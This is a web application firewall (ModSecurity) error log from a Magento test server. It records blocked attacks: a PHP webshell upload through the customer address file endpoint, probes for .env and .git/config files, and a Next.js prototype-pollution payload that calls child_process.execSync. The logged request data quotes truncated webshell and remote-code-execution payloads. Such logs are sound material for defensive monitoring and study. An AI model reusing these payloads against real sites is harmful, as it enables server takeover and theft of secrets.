[Thu Jan 01 14:06:18.218050 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.phar"] [unique_id "aVZxSqOAnROfyL1tsdBeXAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.220440 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.phar"] [unique_id "aVZxSqOAnROfyL1tsdBeXAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.220632 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.phar"] [unique_id "aVZxSqOAnROfyL1tsdBeXAAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.426488 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 9i88364f428d25.php8 found within FILES:custom_attributes[country_id]: 9i88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVZxSqOAnROfyL1tsdBeXQAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/9/i/9i88364f428d25.phar
[Thu Jan 01 14:06:18.427121 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVZxSqOAnROfyL1tsdBeXQAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/9/i/9i88364f428d25.phar
[Thu Jan 01 14:06:18.427316 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVZxSqOAnROfyL1tsdBeXQAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/9/i/9i88364f428d25.phar
[Thu Jan 01 14:06:18.617163 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Rule 7f24adb14be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.php8"] [unique_id "aVZxSqOAnROfyL1tsdBeXgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.617619 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.php8"] [unique_id "aVZxSqOAnROfyL1tsdBeXgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.619931 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.php8"] [unique_id "aVZxSqOAnROfyL1tsdBeXgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 01 14:06:18.620100 2026] [:error] [pid 1117458] [client 46.149.66.101:59942] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/9/i/9i88364f428d25.php8"] [unique_id "aVZxSqOAnROfyL1tsdBeXgAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 02 01:59:43.718411 2026] [authz_core:error] [pid 1135266] [client 143.110.213.72:46176] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jan 02 01:59:46.721426 2026] [:error] [pid 1136061] [client 143.110.213.72:59056] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVcYgvD4DzaBcp8Chf-vQwAAAAc"]
[Fri Jan 02 01:59:46.721711 2026] [:error] [pid 1136061] [client 143.110.213.72:59056] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVcYgvD4DzaBcp8Chf-vQwAAAAc"]
[Fri Jan 02 01:59:46.721857 2026] [:error] [pid 1136061] [client 143.110.213.72:59056] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVcYgvD4DzaBcp8Chf-vQwAAAAc"]
[Fri Jan 02 01:59:47.721416 2026] [:error] [pid 1135268] [client 143.110.213.72:59064] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVcYg_xzwISJoUXnjYWeJQAAAAM"]
[Fri Jan 02 01:59:47.721634 2026] [:error] [pid 1135268] [client 143.110.213.72:59064] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVcYg_xzwISJoUXnjYWeJQAAAAM"]
[Fri Jan 02 01:59:47.721777 2026] [:error] [pid 1135268] [client 143.110.213.72:59064] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVcYg_xzwISJoUXnjYWeJQAAAAM"]
[Fri Jan 02 01:59:49.723007 2026] [:error] [pid 1135327] [client 143.110.213.72:59078] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVcYhYX4jZfBKX_RIuDsHwAAAAY"]
[Fri Jan 02 01:59:49.723240 2026] [:error] [pid 1135327] [client 143.110.213.72:59078] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVcYhYX4jZfBKX_RIuDsHwAAAAY"]
[Fri Jan 02 01:59:49.723401 2026] [:error] [pid 1135327] [client 143.110.213.72:59078] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVcYhYX4jZfBKX_RIuDsHwAAAAY"]
[Fri Jan 02 14:58:29.846143 2026] [:error] [pid 1142259] [client 40.114.177.194:45377] [client 40.114.177.194] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBTRVOXEaCAlm797DiAAAAAs"]
[Fri Jan 02 14:58:29.846278 2026] [:error] [pid 1142259] [client 40.114.177.194:45377] [client 40.114.177.194] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBTRVOXEaCAlm797DiAAAAAs"]
[Fri Jan 02 14:58:29.846387 2026] [:error] [pid 1142259] [client 40.114.177.194:45377] [client 40.114.177.194] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBTRVOXEaCAlm797DiAAAAAs"]
[Fri Jan 02 14:58:29.847652 2026] [:error] [pid 1142259] [client 40.114.177.194:45377] [client 40.114.177.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBTRVOXEaCAlm797DiAAAAAs"]
[Fri Jan 02 14:58:29.847802 2026] [:error] [pid 1142259] [client 40.114.177.194:45377] [client 40.114.177.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBTRVOXEaCAlm797DiAAAAAs"]
[Fri Jan 02 14:58:30.145681 2026] [:error] [pid 1139083] [client 40.114.177.194:45376] [client 40.114.177.194] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBuZJXALhpgUTblBBhgAAAAE"]
[Fri Jan 02 14:58:30.145804 2026] [:error] [pid 1139083] [client 40.114.177.194:45376] [client 40.114.177.194] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var _r = process.mainModule.require;var _cp = _r('child_' + 'process');var _res = _cp.execSync('echo VULN_CHECK_a1b2c3d4e5f6g7h8i9j0', {timeout: 4000, encoding: 'utf8'}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${_res}`..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBuZJXALhpgUTblBBhgAAAAE"]
[Fri Jan 02 14:58:30.145885 2026] [:error] [pid 1139083] [client 40.114.177.194:45376] [client 40.114.177.194] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${_res}`} ) _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then: $b0} _response: {_prefix: var _r = process.mainmodule.require var _cp = _r(child_ process) var _res = _cp.execsync(echo vuln_check_a1b2c3d4e5f6g7h8i9j0 {timeout: 4000 encoding: utf8}).tostring().trim() throw object.assign(new error(next_redirect) {digest: `${_res}`} ) _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBuZJXALhpgUTblBBhgAAAAE"]
[Fri Jan 02 14:58:30.147090 2026] [:error] [pid 1139083] [client 40.114.177.194:45376] [client 40.114.177.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBuZJXALhpgUTblBBhgAAAAE"]
[Fri Jan 02 14:58:30.147252 2026] [:error] [pid 1139083] [client 40.114.177.194:45376] [client 40.114.177.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aVfPBuZJXALhpgUTblBBhgAAAAE"]
[Fri Jan 02 16:37:14.920888 2026] [:error] [pid 1139084] [client 185.65.202.110:44058] [client 185.65.202.110] ModSecurity: Rule 7f31a6cfdbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/1/v188364f428d25.phar"] [unique_id "aVfmKvsbH8tYtcPf-0nO1AAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
